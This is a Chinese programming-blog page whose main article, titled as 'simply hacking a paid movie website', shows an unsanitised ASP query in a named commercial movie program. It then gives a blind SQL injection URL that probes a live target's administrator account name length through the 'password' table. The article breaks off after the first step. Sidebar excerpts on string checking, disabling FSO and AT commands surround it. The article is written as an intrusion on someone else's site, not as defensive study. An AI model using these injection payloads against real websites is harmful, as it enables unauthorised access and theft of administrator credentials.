当前位置:首页 » 编程博文
开发技术指南» 文章正文
    引言: 近日学习sqlinjection,下载金梅收费电影程序2003会
 

 

 ·自定义的字符串类型检测函数    »显示摘要«
    摘要:程序需要,做了一个自定义的检测函数,主要检测字符串的类型,因为需求,将´和%也一同放入英文字符类型中。原理很简单,将字符拆开单取获得asc码,在什么范围就为什么类型,当然检测有局限性。 代码如下: ´#############################################################´名称:strtype......
 ·三种禁用fso的方法    »显示摘要«
    摘要:众所周知,filesystemobject组件的强大功能及破坏性是它屡屡被免费主页 提供商(那些支持asp)的禁用的原因,我整理了一下,本来只找到两种方法,后来 被某人一刺激,硬是想到第三种不为人所知的方法,呵呵,也不知道是不是这样的。 第一种:用regsrv32 /u c:\windows\system\scrrun.dll(win98路径)来注销该组件。此方法过于狠毒,属于同归于尽的方法,大家......


简单入侵收费电影网站!
近日学习sql injection,下载金梅收费电影程序2003会员版看了一通,

现movie.asp这个文件有问题, 【程序编程相关:面向呼叫控制和无线网的JAIN API

【推荐阅读:SYN Cookie在Linux内核中的

  dim sql 【扩展信息:关于cocoon的文章

  dim rs

  articleid=request("id")

  set rs=server.createobject("adodb.recordset")

  sql="update learning set hits=hits+1 where articleid="&articleid

  rs.open sql,conn,1,3

  sql="select * from learning where articleid="&articleid

  rs.open sql,conn,1,1

  title=rs("title")

  ittype=rs("typeid")

没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,

我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:

http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)

正常返回页面,由此我们可以知道管理员的帐号是大于4位的!

我们继续,


...   下一页
 ·at指令:at+cpms介绍    »显示摘要«
    摘要:这是我在siemens at command set里面摘录的一段: at+cpms preferred sms message storage revision according to gsm 07.05 version 4.7.0 test command at+cpms=? response +cpms: (list of supported <mem1>s),( ......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE